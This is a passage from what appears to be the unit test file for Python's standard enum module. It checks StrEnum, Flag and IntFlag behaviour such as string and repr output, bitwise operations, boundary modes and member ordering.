self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_missing_value_error(self):
with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
class Combined(str, Enum):
#
def __new__(cls, value, sequence):
enum = str.__new__(cls, value)
if '(' in value:
fis_name, segment = value.split('(', 1)
segment = segment.strip(' )')
else:
fis_name = value
segment = None
enum.fis_name = fis_name
enum.segment = segment
enum.sequence = sequence
return enum
#
def __repr__(self):
return "<%s.%s>" % (self.__class__.__name__, self._name_)
#
key_type = 'An$(1,2)', 0
company_id = 'An$(3,2)', 1
code = 'An$(5,1)', 2
description = 'Bn$', 3
@unittest.skipUnless(
sys.version_info[:2] == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
@unittest.skipUnless(
sys.version_info[:2] < (3, 12),
'member-member access now raises an exception',
)
def test_warning_for_member_from_member_access(self):
with self.assertWarns(DeprecationWarning):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
self.assertIs(Di.NO, nope)
@unittest.skipUnless(
sys.version_info[:2] >= (3, 12),
'member-member access currently issues a warning',
)
def test_exception_for_member_from_member_access(self):
with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
def test_strenum_auto(self):
class Strings(StrEnum):
ONE = auto()
TWO = auto()
self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])
def test_dynamic_members_with_static_methods(self):
#
foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
class Foo(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
})
def upper(self):
return self.value.upper()
self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
self.assertEqual(Foo.FOO_CAT.value, 'aloof')
self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
#
with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
class FooBar(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
},
**{'FOO_CAT': 'small'},
)
def upper(self):
return self.value.upper()
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(Perm(~0)), 'R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_boundary(self):
self.assertIs(enum.Flag._boundary_, STRICT)
class Iron(Flag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(Flag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(Flag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(Flag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_number_reset_and_order_cleanup(self):
class Confused(Flag):
_order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN'
ONE = auto()
TWO = auto()
FOUR = auto()
DOS = 2
EIGHT = auto()
SIXTEEN = auto()
self.assertEqual(
list(Confused),
[Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN])
self.assertIs(Confused.TWO, Confused.DOS)
self.assertEqual(Confused.DOS._value_, 2)
self.assertEqual(Confused.EIGHT._value_, 8)
self.assertEqual(Confused.SIXTEEN._value_, 16)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
with self.assertRaisesRegex(TypeError, "invalid Flag 'Bizarre' -- missing values: 1, 2"):
class Bizarre(Flag):
b = 3
c = 4
d = 6
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
class Skip(IntFlag):
FIRST = 1
SECOND = 2
EIGHTH = 8
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm.R | 8), '12')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(Perm(8)), '8')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(~(Perm.R | 8)), '-13')
self.assertEqual(str(Perm(~0)), 'R|W|X')
self.assertEqual(str(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(Open(4)), '4')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
self.assertEqual(str(Open(~4)), '-5')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm.R | 8), '12')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(Perm(8)), '8')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(~(Perm.R | 8)), '-13')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(Open(4)), '4')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(repr(Open(~4)), '-5')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, (~i).value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_boundary(self):
self.assertIs(enum.IntFlag._boundary_, EJECT)
class Iron(IntFlag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(IntFlag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(IntFlag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(IntFlag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5)
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
